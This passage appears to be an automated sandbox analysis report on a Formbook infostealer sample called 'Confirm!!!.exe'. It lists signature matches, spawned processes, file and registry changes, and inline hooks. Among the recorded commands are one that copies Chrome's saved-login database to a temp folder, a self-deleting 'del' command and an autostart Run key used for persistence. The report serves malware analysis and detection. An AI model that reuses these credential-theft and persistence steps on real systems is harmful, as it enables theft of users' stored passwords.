          Source: 00000008.00000002.506851643.00000000028F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.505585690.0000000000820000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.505585690.0000000000820000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.288371547.0000000001030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.288371547.0000000001030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.507682099.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.507682099.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.251271750.0000000003E7F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.251271750.0000000003E7F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Confirm!!!.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Confirm!!!.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Confirm!!!.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Confirm!!!.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ms9r74an.exe.3.dr | Static PE information: Section: .reloc ZLIB complexity 1.021484375
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@12/9@10/1
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0087C5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,8_2_0087C5CA
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0089A0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,8_2_0089A0D2
          Source: C:\Windows\explorer.exe | File created: C:\Program Files (x86)\Fjdftnbgp
          Source: C:\Users\user\Desktop\Confirm!!!.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Confirm!!!.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Mutant created: \Sessions\1\BaseNamedObjects\gJEYWsWfigSZWpy
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_01
          Source: C:\Windows\explorer.exe | File created: C:\Users\user~1\AppData\Local\Temp\Fjdftnbgp
          Source: Confirm!!!.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exe | File read: C:\Users\user\AppData\Roaming\-Q928--Q\-Q9logri.ini
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\cmd.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Confirm!!!.exe | Virustotal: Detection: 25%
          Source: Confirm!!!.exe | ReversingLabs: Detection: 37%
          Source: unknown | Process created: C:\Users\user\Desktop\Confirm!!!.exe 'C:\Users\user\Desktop\Confirm!!!.exe'
          Source: unknown | Process created: C:\Users\user\Desktop\Confirm!!!.exe {path}
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Confirm!!!.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exe C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exe
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Process created: C:\Users\user\Desktop\Confirm!!!.exe {path}
          Source: C:\Windows\explorer.exe | Process created: C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exe C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exe
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Confirm!!!.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ad05575-8857-4850-9277-11b85bdb8e09}\InProcServer32
          Source: C:\Windows\SysWOW64\cmd.exe | File written: C:\Users\user\AppData\Roaming\-Q928--Q\-Q9logri.ini
          Source: C:\Users\user\Desktop\Confirm!!!.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\cmd.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Confirm!!!.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Confirm!!!.exe | Static file information: File size 1065472 > 1048576
          Source: Confirm!!!.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmd.pdbUGP source: Confirm!!!.exe, 00000002.00000002.288927299.0000000001920000.00000040.00000001.sdmp, cmd.exe, 00000008.00000002.505873139.0000000000870000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Confirm!!!.exe, 00000002.00000002.288548152.00000000015EF000.00000040.00000001.sdmp, cmd.exe, 00000008.00000002.509517290.000000000311F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Confirm!!!.exe, 00000002.00000002.288548152.00000000015EF000.00000040.00000001.sdmp, cmd.exe
          Source: Binary string: cmd.pdb source: Confirm!!!.exe, 00000002.00000002.288927299.0000000001920000.00000040.00000001.sdmp, cmd.exe

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: Confirm!!!.exe, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Confirm!!!.exe.a50000.0.unpack, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Confirm!!!.exe.a50000.0.unpack, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.Confirm!!!.exe.9a0000.0.unpack, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.Confirm!!!.exe.9a0000.1.unpack, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: ms9r74an.exe.3.dr, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 28.2.ms9r74an.exe.3b0000.0.unpack, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 28.0.ms9r74an.exe.3b0000.0.unpack, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 0_2_02D6BBB5 push F4053728h; ret 0_2_02D6BBC5
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_00408047 push FFFFFF9Fh; iretd 2_2_0040804A
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_004182EB push ds; retf 2_2_004182EE
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041DC8C push ebx; ret 2_2_0041DD55
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041DD56 push ebx; ret 2_2_0041DD55
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_004165F7 push BC1E6DA9h; retf 2_2_004165FC
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041CE19 push edx; ret 2_2_0041CF3C
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041C6F2 push eax; ret 2_2_0041C6F8
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041C6FB push eax; ret 2_2_0041C762
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041C6A5 push eax; ret 2_2_0041C6F8
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041C75C push eax; ret 2_2_0041C762
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_008876BD push ecx; ret 8_2_008876D0
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_008876D1 push ecx; ret 8_2_008876E4
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0307D0D1 push ecx; ret 8_2_0307D0E4
          Source: C:\Windows\explorer.exe | File created: C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exe
          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\Fjdftnbgp\ms9r74an.exe

          Boot Survival:

          Creates an undocumented autostart registry key
          Source: C:\Windows\SysWOW64\cmd.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C6QLPDJ0

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xC3 0x36
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Confirm!!!.exeProcess info